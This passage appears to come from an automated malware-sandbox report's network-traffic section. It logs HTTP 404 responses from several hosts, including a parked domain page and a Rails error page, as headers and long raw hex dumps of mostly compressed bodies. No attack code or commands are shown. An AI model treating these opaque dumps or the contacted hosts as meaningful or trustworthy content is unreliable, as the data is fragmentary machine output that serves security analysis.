cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 11 38 6a fe af 39 cb 24 f3 0f b7 4c 1c 3c 7e d4 63 bb b7 ad 4c a5 c2 af 48 77 58 de 59 27 9d a4 43 9e 01 fe 5c 01 95 32 c0 8f 09 08 87 bf 02 e7 0b f8 e8 e2 ea d3 8b 8f e1 f3 1f fe ec f5 e5 f9 f5 b2 72 f6 20 9e 19 57 e6 69 7a 7c 7e ca d8 78 23 76 4b 9a f4 91 9a 69 4d c8 b6 b3 8d 81 95 c1 fb 84 5a 35 06 45 2f a0 25 4d 9a 22 36 ae 62 a8 3c 24 2c 8e 8c 38 96 25 ca 11 68 28 4a a1 3e ce 2a 9d f6 4a b9 34 e9 7a 5c 12 ed c6 85 40 18 65 8a ba 52 ae 2a a3 a9 dc db a1 a8 8b 8f 0e 50 f5 33 a9 d4 6b e9 54 43 07 4d 53 90 e4 17 82 d7 52 66 6c d3 5e 5f 40 9c ec 6e 0e 42 81 1b e7 2d a1 71 51 12 c7 42 8a 58 8a d1 b8 a0 91 3b e3 9c ff 36 8c e2 a1 e8 7a 6a 0f db 5a 6e d4 63 71 2d 8d 29 aa 95 86 08 3a 24 eb 86 6f 9b 52 c3 58 57 87 4b 67 e9 68 ba ad 6a c5 e5 a9 54 e5 a5 23 ee 2b 4b 07 c0 4b 58 3a dc a7 8c b2 a5 33 75 77 53 77 e9 20 8c e4 ce a0 10 c9 d9 eb 01 c2 48 3f af 60 d6 f4 f3 ea 75 54 3f af 2e 3e 0e d4 cf 6f 54 6d 93 ca f5 3a 94 aa 2a 15 26 2a a7 81 2f 6e 3a 1d bf 74 b6 35 91 fd 23 4b e7 51 3b 62 dc 94 34 22 29 55 7a 1e ff 59 36 d1 84 7a d4 47 7d bf 18 3a a7 47 cb 75 80 00 1a 81 42 c3 99 6c 29 d1 0e d6 94 19 9c 3a c3 23 29 31 54 e0 aa 91 5b 4d 61 8d e5 c2 ef f5 90 5a b2 66 9a 17 ff 61 13 75 4d c2 66 37 52 1b 1d 4a ac 40 94 c2 66 9a 1f 74 e2 4b 6f e5 67 b9 65 f7 0b 2d b5 2e 54 75 6d 54 23 56 92 6a 69 2e 8d dc 58 0a 37 dd 05 da dc ae 5a e4 2f 96 b1 6d 2d f8 04 69 77 7d 8f 42 4f 5d c6 06 bd 8a a4 cd d6 33 b8 92 a9 b1 18 66 58 d2 54 54 cf 42 d3 ea ad 9d 78 c1 b4 67 60 63 49 f3 a2 2c 6f e4 ce 58 06 33 cc f4 92 b2 89 30 7d f8 db a2 32 9e fb 5e d3 88 17 Data Ascii: 221dtDXz4ByO
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:36:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kernelphysics.com/wp-json/>; rel="https://api.w.org/"Server: Nginx_Rc-CrContent-Encoding: brData Raw: 32 32 31 64 0d 0a 15 74 9b 8c 44 58 93 7a 00 34 42 87 cf 79 ff ef 4f fd fe bf ed 9f af 1d 65 c5 86 1c 49 48 14 17 1c 98 92 c9 b9 37 33 3d e5 b5 38 2b 4b 80 b0 49 30 62 21 11 3b 97 e1 95 d2 cf 9d d7 eb b4 eb f3 f7 e7 bf 7c 53 75 09 28 86 ce e3 ca ae 3c 2e ca 90 62 95 73 49 be b0 ab f9 7b ff 6e e6 0e 07 78 70 80 c2 01 20 3d a0 22 c0 30 cc 6f c3 df 7f 09 14 00 52 12 08 2a 80 54 0c b1 73 d5 84 dc b9 2c cf 19 56 c5 d6 ae b4 0c 73 d9 d3 f9 6d ea dd 95 27 84 10 42 08 2d 6c 6e c3 d9 31 b1 fe 3b 85 84 01 0d 12 99 3c 86 fb fe fa 57 18 db 70 41 89 c8 de 85 28 01 26 2e d9 7b bc 2b 72 b8 bc 80 39 dc c7 40 45 20 da 9a 11 92 15 b9 bd 06 34 56 c8 39 60 93 10 98 37 05 2a 45 1e 35 8a e1 7c 33 0b e6 07 35 fb 50 cd 46 ac 95 91 88 42 25 18 b9 bc b0 ef 59 a7 c3 38 89 10 f0 0e ba 15 87 95 c0 9c 9d b3 92 42 4b 36 10 21 26 b7 cb 84 09 e8 b3 28 8f ac 36 f5 8a 37 af c6 2e af 1c ce 63 0e 16 d5 8a fc ae cb 2a 4f b2 a9 64 29 43 90 a5 26 ed 36 65 53 a7 a7 ce 20 9c e1 e1 e0 6c 55 98 e6 f8 b4 00 c8 71 d9 ee fe 67 68 56 a1 ea cc 03 11 38 6a fe af 39 cb 24 f3 0f b7 4c 1c 3c 7e d4 63 bb b7 ad 4c a5 c2 af 48 77 58 de 59 27 9d a4 43 9e 01 fe 5c 01 95 32 c0 8f 09 08 87 bf 02 e7 0b f8 e8 e2 ea d3 8b 8f e1 f3 1f fe ec f5 e5 f9 f5 b2 72 f6 20 9e 19 57 e6 69 7a 7c 7e ca d8 78 23 76 4b 9a f4 91 9a 69 4d c8 b6 b3 8d 81 95 c1 fb 84 5a 35 06 45 2f a0 25 4d 9a 22 36 ae 62 a8 3c 24 2c 8e 8c 38 96 25 ca 11 68 28 4a a1 3e ce 2a 9d f6 4a b9 34 e9 7a 5c 12 ed c6 85 40 18 65 8a ba 52 ae 2a a3 a9 dc db a1 a8 8b 8f 0e 50 f5 33 a9 d4 6b e9 54 43 07 4d 53 90 e4 17 82 d7 52 66 6c d3 5e 5f 40 9c ec 6e 0e 42 81 1b e7 2d a1 71 51 12 c7 42 8a 58 8a d1 b8 a0 91 3b e3 9c ff 36 8c e2 a1 e8 7a 6a 0f db 5a 6e d4 63 71 2d 8d 29 aa 95 86 08 3a 24 eb 86 6f 9b 52 c3 58 57 87 4b 67 e9 68 ba ad 6a c5 e5 a9 54 e5 a5 23 ee 2b 4b 07 c0 4b 58 3a dc a7 8c b2 a5 33 75 77 53 77 e9 20 8c e4 ce a0 10 c9 d9 eb 01 c2 48 3f af 60 d6 f4 f3 ea 75 54 3f af 2e 3e 0e d4 cf 6f 54 6d 93 ca f5 3a 94 aa 2a 15 26 2a a7 81 2f 6e 3a 1d bf 74 b6 35 91 fd 23 4b e7 51 3b 62 dc 94 34 22 29 55 7a 1e ff 59 36 d1 84 7a d4 47 7d bf 18 3a a7 47 cb 75 80 00 1a 81 42 c3 99 6c 29 d1 0e d6 94 19 9c 3a c3 23 29 31 54 e0 aa 91 5b 4d 61 8d e5 c2 ef f5 90 5a b2 66 9a 17 ff 61 13 75 4d c2 66 37 52 1b 1d 4a ac 40 94 c2 66 9a 1f 74 e2 4b 6f e5 67 b9 65 f7 0b 2d b5 2e 54 75 6d 54 23 56 92 6a 69 2e 8d dc 58 0a 37 dd 05 da dc ae 5a e4 2f 96 b1 6d 2d f8 04 69 77 7d 8f 42 4f 5d c6 06 bd 8a a4 cd d6 33 b8 92 a9 b1 18 66 58 d2 54 54 cf 42 d3 ea ad 9d 78 c1 b4 67 60 63 49 f3 a2 2c 6f e4 ce 58 06 33 cc f4 92 b2 89 30 7d f8 db a2 32 9e fb 5e d3 88 17 Data Ascii: 221dtDXz4ByO
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:36:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 10 37 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 c0 e2 d0 bc 51 9a 3f 4c a5 6c 0d a4 e7 6c a8 30 32 df 0d cb d5 12 da ab 20 f0 83 43 76 a8 89 65 f4 09 03 bb 51 2a 0e 04 ab 64 56 1e 45 1b 6c e5 67 96 8b 20 03 c3 91 46 c2 43 cb 36 db a9 28 df 4c dd 41 32 5a 1a af 6d bf 33 ce 90 dd 36 86 b0 95 d0 ff 5a 64 be 56 8a 56 2e 63 dc 4e 3e b5 da dd 96 eb 74 7b 11 f0 40 63 a9 a0 38 0e 37 6e b5 d2 0a 1a 72 aa 44 8f 9e 62 be e3 6c 2e ec 6a 78 7e 44 22 45 ea 0a 26 8a bf 8e f7 e2 47 f1 4e fc 58 c4 df c6 77 92 f7 f1 f1 5e bc 9b 7c 90 dc c0 e7 5d fc ee c5 db f1 1d aa de 5e f2 da e1 70 a5 0e 6f d4 7e db 36 08 b5 19 56 7b 51 34 0c cf 5a 16 9c cf 84 fb 6a 67 f0 fc 0d df 75 fd 2d e1 f9 fe 50 01 25 f8 00 3f 00 5a 54 00 3c cb a0 4b 4e dd 6a c3 eb fb 10 e6 6f 34 bb 99 bc 9f dc ac 5b b2 59 b7 b0 8e 66 7d 66 31 5d d5 6a a5 9e 6e 6c 05 12 ee 18 64 0a 9e 2d 6f b1 2f b6 e0 0b a0 85 85 8d d8 2c 3d 3f 8c 40 22 46 18 c9 c8 b1 61 80 99 59 a7 74 6d a4 f3 93 9d 96 27 da 98 b1 88 c1 d4 50 5a c0 1b bd e5 66 7d b8 b8 6f 47 69 14 c3 55 9f dd 56 f5 76 d0 8c 77 b5 b9 e2 27 64 c7 f8 09 db f6 c1 3e 6b 4e a9 7c b8 68 d9 ed 51 14 f9 5e 98 e9 1b eb 2e 80 40 57 42 4a fd 01 46 70 fd a0 c5 56 56 9e 4d 50 4b 2b 42 e7 3d d5 82 fd 07 d2 65 63 a4 3a cd fb e7 fa 4b db b3 61 c0 c9 85 21 86 b2 d3 81 99 5a 2e 21 67 16 79 44 d0 1a 7d d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 a0 98 c7 df 4b 72 30 5c 41 9f 56 e8 8f 02 5b 35 32 11 88 99 4b cd df d0 28 84 44 51 5c 2f 39 4e 51 7e a6 ee 82 3f 1e bc 9e 8e 3f 90 4e 4e f0 99 d3 14 44 d7 0d 2c 4f 6d 59 ab a3 68 90 49 36 57 7a aa a7 18 33 1a 64 92 2f 51 91 8d 55 49 a7 eb 35 42 28 ca eb b4 30 d6 c1 0b 8d ff 01 60 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 5e 38 5a 70 c5 70 28 bd 39 98 1d 06 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:37:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 10 37 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 c0 e2 d0 bc 51 9a 3f 4c a5 6c 0d a4 e7 6c a8 30 32 df 0d cb d5 12 da ab 20 f0 83 43 76 a8 89 65 f4 09 03 bb 51 2a 0e 04 ab 64 56 1e 45 1b 6c e5 67 96 8b 20 03 c3 91 46 c2 43 cb 36 db a9 28 df 4c dd 41 32 5a 1a af 6d bf 33 ce 90 dd 36 86 b0 95 d0 ff 5a 64 be 56 8a 56 2e 63 dc 4e 3e b5 da dd 96 eb 74 7b 11 f0 40 63 a9 a0 38 0e 37 6e b5 d2 0a 1a 72 aa 44 8f 9e 62 be e3 6c 2e ec 6a 78 7e 44 22 45 ea 0a 26 8a bf 8e f7 e2 47 f1 4e fc 58 c4 df c6 77 92 f7 f1 f1 5e bc 9b 7c 90 dc c0 e7 5d fc ee c5 db f1 1d aa de 5e f2 da e1 70 a5 0e 6f d4 7e db 36 08 b5 19 56 7b 51 34 0c cf 5a 16 9c cf 84 fb 6a 67 f0 fc 0d df 75 fd 2d e1 f9 fe 50 01 25 f8 00 3f 00 5a 54 00 3c cb a0 4b 4e dd 6a c3 eb fb 10 e6 6f 34 bb 99 bc 9f dc ac 5b b2 59 b7 b0 8e 66 7d 66 31 5d d5 6a a5 9e 6e 6c 05 12 ee 18 64 0a 9e 2d 6f b1 2f b6 e0 0b a0 85 85 8d d8 2c 3d 3f 8c 40 22 46 18 c9 c8 b1 61 80 99 59 a7 74 6d a4 f3 93 9d 96 27 da 98 b1 88 c1 d4 50 5a c0 1b bd e5 66 7d b8 b8 6f 47 69 14 c3 55 9f dd 56 f5 76 d0 8c 77 b5 b9 e2 27 64 c7 f8 09 db f6 c1 3e 6b 4e a9 7c b8 68 d9 ed 51 14 f9 5e 98 e9 1b eb 2e 80 40 57 42 4a fd 01 46 70 fd a0 c5 56 56 9e 4d 50 4b 2b 42 e7 3d d5 82 fd 07 d2 65 63 a4 3a cd fb e7 fa 4b db b3 61 c0 c9 85 21 86 b2 d3 81 99 5a 2e 21 67 16 79 44 d0 1a 7d d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 a0 98 c7 df 4b 72 30 5c 41 9f 56 e8 8f 02 5b 35 32 11 88 99 4b cd df d0 28 84 44 51 5c 2f 39 4e 51 7e a6 ee 82 3f 1e bc 9e 8e 3f 90 4e 4e f0 99 d3 14 44 d7 0d 2c 4f 6d 59 ab a3 68 90 49 36 57 7a aa a7 18 33 1a 64 92 2f 51 91 8d 55 49 a7 eb 35 42 28 ca eb b4 30 d6 c1 0b 8d ff 01 60 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 5e 38 5a 70 c5 70 28 bd 39 98 1d 06 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:37:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 8c 7a 6a 38 54 ae e3 99 be 87 bf aa 6e e9 ba 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 9a 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 c2 b2 70 86 1c 45 be 69 87 21 a6 98 f4 77 b0 8c ac f5 86 84 5c be 67 e2 cf ea 72 49 90 fe a0 ae 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 10 37 90 76 7f 8d 1b 5c f4 65 47 34 c4 c6 c8 b3 23 c7 f7 2a d5 ab d7 57 8e 58 c7 2e 5f 6e 1e b3 ea 56 3a 48 3a 98 c0 e2 d0 bc 51 9a 3f 4c a5 6c 0d a4 e7 6c a8 30 32 df 0d cb d5 12 da ab 20 f0 83 43 76 a8 89 65 f4 09 03 bb 51 2a 0e 04 ab 64 56 1e 45 1b 6c e5 67 96 8b 20 03 c3 91 46 c2 43 cb 36 db a9 28 df 4c dd 41 32 5a 1a af 6d bf 33 ce 90 dd 36 86 b0 95 d0 ff 5a 64 be 56 8a 56 2e 63 dc 4e 3e b5 da dd 96 eb 74 7b 11 f0 40 63 a9 a0 38 0e 37 6e b5 d2 0a 1a 72 aa 44 8f 9e 62 be e3 6c 2e ec 6a 78 7e 44 22 45 ea 0a 26 8a bf 8e f7 e2 47 f1 4e fc 58 c4 df c6 77 92 f7 f1 f1 5e bc 9b 7c 90 dc c0 e7 5d fc ee c5 db f1 1d aa de 5e f2 da e1 70 a5 0e 6f d4 7e db 36 08 b5 19 56 7b 51 34 0c cf 5a 16 9c cf 84 fb 6a 67 f0 fc 0d df 75 fd 2d e1 f9 fe 50 01 25 f8 00 3f 00 5a 54 00 3c cb a0 4b 4e dd 6a c3 eb fb 10 e6 6f 34 bb 99 bc 9f dc ac 5b b2 59 b7 b0 8e 66 7d 66 31 5d d5 6a a5 9e 6e 6c 05 12 ee 18 64 0a 9e 2d 6f b1 2f b6 e0 0b a0 85 85 8d d8 2c 3d 3f 8c 40 22 46 18 c9 c8 b1 61 80 99 59 a7 74 6d a4 f3 93 9d 96 27 da 98 b1 88 c1 d4 50 5a c0 1b bd e5 66 7d b8 b8 6f 47 69 14 c3 55 9f dd 56 f5 76 d0 8c 77 b5 b9 e2 27 64 c7 f8 09 db f6 c1 3e 6b 4e a9 7c b8 68 d9 ed 51 14 f9 5e 98 e9 1b eb 2e 80 40 57 42 4a fd 01 46 70 fd a0 c5 56 56 9e 4d 50 4b 2b 42 e7 3d d5 82 fd 07 d2 65 63 a4 3a cd fb e7 fa 4b db b3 61 c0 c9 85 21 86 b2 d3 81 99 5a 2e 21 67 16 79 44 d0 1a 7d d6 56 cf 77 42 6b d5 ee 29 bb df 58 ea 70 a0 98 c7 df 4b 72 30 5c 41 9f 56 e8 8f 02 5b 35 32 11 88 99 4b cd df d0 28 84 44 51 5c 2f 39 4e 51 7e a6 ee 82 3f 1e bc 9e 8e 3f 90 4e 4e f0 99 d3 14 44 d7 0d 2c 4f 6d 59 ab a3 68 90 49 36 57 7a aa a7 18 33 1a 64 92 2f 51 91 8d 55 49 a7 eb 35 42 28 ca eb b4 30 d6 c1 0b 8d ff 01 60 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 5e 38 5a 70 c5 70 28 bd 39 98 1d 06 f
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:37:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 70 70 65 6c 69 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 1bdc198a-460a-4c1b-9118-0ce778869a37x-runtime: 0.040465content-length: 18203connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 